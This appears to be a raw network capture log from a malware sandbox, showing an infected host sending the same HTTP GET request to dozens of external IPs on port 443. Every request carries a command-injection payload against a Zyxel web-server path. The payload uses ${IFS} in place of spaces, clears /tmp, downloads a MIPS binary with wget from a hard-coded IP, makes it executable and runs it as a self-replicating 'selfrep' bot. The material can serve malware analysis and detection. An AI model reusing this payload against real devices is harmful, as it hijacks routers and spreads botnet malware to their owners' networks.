                                                Jan 12, 2024 18:16:19.359057903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3505192.168.2.234062477.207.5.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359081030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3506192.168.2.233864086.30.195.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359112978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3507192.168.2.2353614193.41.50.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359154940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3508192.168.2.234041217.158.183.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359213114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3509192.168.2.234341652.136.143.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359266043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3510192.168.2.2332932113.159.44.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359299898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3511192.168.2.2350222141.206.87.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359330893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3512192.168.2.235392257.230.210.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359395027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3513192.168.2.2348880176.154.50.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359414101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3514192.168.2.233394234.71.18.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359457970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3515192.168.2.2349076207.202.17.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359493971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3516192.168.2.235342286.204.11.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359540939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3517192.168.2.2341876177.106.60.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359575987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3518192.168.2.234106639.184.117.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359591007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3519192.168.2.2347294213.171.16.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359637976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3520192.168.2.2336190198.73.1.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359705925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3521192.168.2.2341390159.247.29.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359750986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3522192.168.2.233600076.156.180.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359791040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3523192.168.2.235607439.209.37.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359834909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3524192.168.2.2349812173.158.246.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359868050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3525192.168.2.2352550119.227.40.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359901905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3526192.168.2.235203840.230.126.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.359930992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3527192.168.2.233443279.113.174.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360002041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3528192.168.2.235704061.205.11.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360048056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3529192.168.2.2340638126.85.228.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360096931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3530192.168.2.2334246184.58.91.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360120058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3531192.168.2.233529441.37.160.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360152960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3532192.168.2.2358648161.175.118.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360205889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3533192.168.2.2351920177.204.223.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360249996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3534192.168.2.235745874.83.247.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360306978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3535192.168.2.2336228203.21.44.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360338926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3536192.168.2.234578862.187.191.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360372066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3537192.168.2.233587624.125.81.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360399961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3538192.168.2.235095624.102.229.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360450983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3539192.168.2.2337360115.232.90.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360505104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3540192.168.2.2348074153.56.201.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360517979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3541192.168.2.2346908162.172.58.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360548973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3542192.168.2.2346004173.108.124.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360604048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3543192.168.2.2337116203.9.117.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360624075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3544192.168.2.2350206166.125.59.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360691071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3545192.168.2.234670295.52.235.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360717058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3546192.168.2.2341680216.56.156.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360776901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3547192.168.2.235526862.228.233.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360805988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3548192.168.2.2352832123.35.243.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360845089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3549192.168.2.2356026216.157.95.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360887051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3550192.168.2.236000885.58.96.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360927105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3551192.168.2.2357642133.74.156.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360961914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3552192.168.2.2340916150.156.26.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.360982895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3553192.168.2.234574844.5.121.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361018896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3554192.168.2.2360448138.123.243.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361059904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3555192.168.2.2334652196.60.253.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361090899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3556192.168.2.2343736165.18.151.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361150026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3557192.168.2.2353804124.157.31.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361192942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3558192.168.2.2333966100.32.232.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361219883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3559192.168.2.235182851.91.166.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361254930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3560192.168.2.2350682159.102.10.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361279964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3561192.168.2.234531213.50.1.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361337900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3562192.168.2.2335188151.115.165.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361366987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3563192.168.2.233409654.183.46.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361426115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3564192.168.2.233665423.109.98.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361458063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3565192.168.2.2336150107.111.122.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361485958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3566192.168.2.2351348197.80.251.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.361510992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3567192.168.2.235660831.244.94.120443
                                                TimestampBytes transferredDirectionData
